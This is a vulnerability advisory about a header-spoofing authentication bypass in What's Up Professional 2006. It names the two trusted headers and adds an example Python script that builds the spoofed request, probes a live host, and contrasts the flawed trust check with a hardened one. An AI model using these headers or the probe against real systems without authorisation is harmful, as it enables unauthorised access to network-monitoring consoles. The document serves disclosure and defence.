What's Up Professional Spoofing Authentication Bypass



What's Up Professional 2006 is vulnerable to a spoofing attack whereby
the attacker can make the web interface believe a request originates
from the local console application (which it treats as trusted). This
lets an attacker bypass the application's authentication mechanism and
log in without credentials.

The application treats any HTTP request that carries the following two
headers as a trusted (console) request:
User-Agent: Ipswitch/1.0
User-Application: NmConsole

Both headers are entirely under the client's control, so they can be
spoofed trivially: any HTTP client that lets you set arbitrary headers
will do. An easy way to accomplish the spoof is to use an intercepting
web proxy such as WebScarab (see owasp.org) and add the two headers to
an ordinary request.
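The following Python script is an added example and is not part of the original advisory or Ipswitch's code. It builds the spoofed request described above, offers a two-request probe against a live host (plain request versus request with the console headers), and models the trust decision the advisory describes next to a check that does not depend on client-controlled headers. The server-side functions are a reconstruction of the described behaviour; the `X-Session-Token` header and the loopback requirement in the hardened version are assumptions made for the example, not the vendor's fix.

```python
"""Added example for the What's Up Professional header-spoofing issue.

Nothing here is the vendor's code: the server-side functions reconstruct
the behaviour the advisory describes, and the hardened variant is an
assumed fix for illustration only.
"""
import http.client
from ipaddress import ip_address

# Header values the advisory says the application treats as "from the console".
CONSOLE_HEADERS = {
    "User-Agent": "Ipswitch/1.0",
    "User-Application": "NmConsole",
}

# Assumed name for a post-login session header in the hardened check below.
SESSION_HEADER = "X-Session-Token"


def build_spoofed_request(host: str, path: str = "/") -> bytes:
    """Return the raw HTTP/1.1 request an attacker would send, e.g. by
    pasting it into an intercepting proxy.  Pure string building, so it
    runs offline."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    lines += [f"{k}: {v}" for k, v in CONSOLE_HEADERS.items()]
    lines += ["Connection: close", "", ""]
    return "\r\n".join(lines).encode("ascii")


def probe(host: str, port: int, path: str = "/") -> tuple:
    """Live check (needs network access): fetch `path` once with plain
    headers and once with the console headers, returning both status codes.
    A redirect-to-login or 401 for the first and a 200 for the second is the
    tell-tale sign that the header-based trust is in place."""
    codes = []
    for headers in ({}, CONSOLE_HEADERS):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request("GET", path, headers=headers)
        codes.append(conn.getresponse().status)
        conn.close()
    return codes[0], codes[1]


def _lower(headers: dict) -> dict:
    """HTTP header names are case-insensitive; normalise before comparing."""
    return {k.lower(): v for k, v in headers.items()}


def vulnerable_is_console(headers: dict) -> bool:
    """Reconstruction of the trust decision the advisory describes: whoever
    sends the two headers is treated as the local console, no matter where
    the request comes from."""
    h = _lower(headers)
    return all(h.get(k.lower()) == v for k, v in CONSOLE_HEADERS.items())


def hardened_is_console(headers: dict, peer_ip: str, valid_tokens: set) -> bool:
    """Assumed fix (not the vendor's): the request must arrive over the
    loopback interface AND carry a session token issued after real
    authentication.  A remote attacker controls every header but not the
    source address of an established TCP connection or the token."""
    if not ip_address(peer_ip).is_loopback:
        return False
    return _lower(headers).get(SESSION_HEADER.lower()) in valid_tokens


if __name__ == "__main__":
    # Constructed input: what a remote attacker sends, as seen by the server.
    attacker = dict(CONSOLE_HEADERS)
    print(build_spoofed_request("192.0.2.5").decode())
    print("vulnerable check trusts remote attacker:", vulnerable_is_console(attacker))
    print("hardened check trusts remote attacker:  ",
          hardened_is_console(attacker, "192.0.2.10", {"s3cr3t"}))
```

`probe()` is the only function that touches the network; run it as `probe("monitor.example", 80)` against a lab instance and compare the two status codes. The hardened check shows the general principle rather than a specific patch: identity must rest on something the client cannot forge, and a User-Agent string never qualifies.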

I have put a more detailed text file here:
http://www.ftusecurity.com/pub/whatsup.public.pdf 

I contacted IPSwitch. They said the issue would be fixed in the next
release. I followed up twice to find a status and did not receive a reply.

Since the release of some What's Up Professional vulnerabilities
recently -- see: http://www.securityfocus.com/archive/1/433808 -- I 
decided to release this information. I've been burned in the past by
reporting vulnerabilities responsibly to vendors: someone else
irresponsibly discloses the issue publicly before the fix is released,
and the company does not credit me with the initial report.

Sincerely,
Kenneth F. Belva, CISSP
http://www.ftusecurity.com 


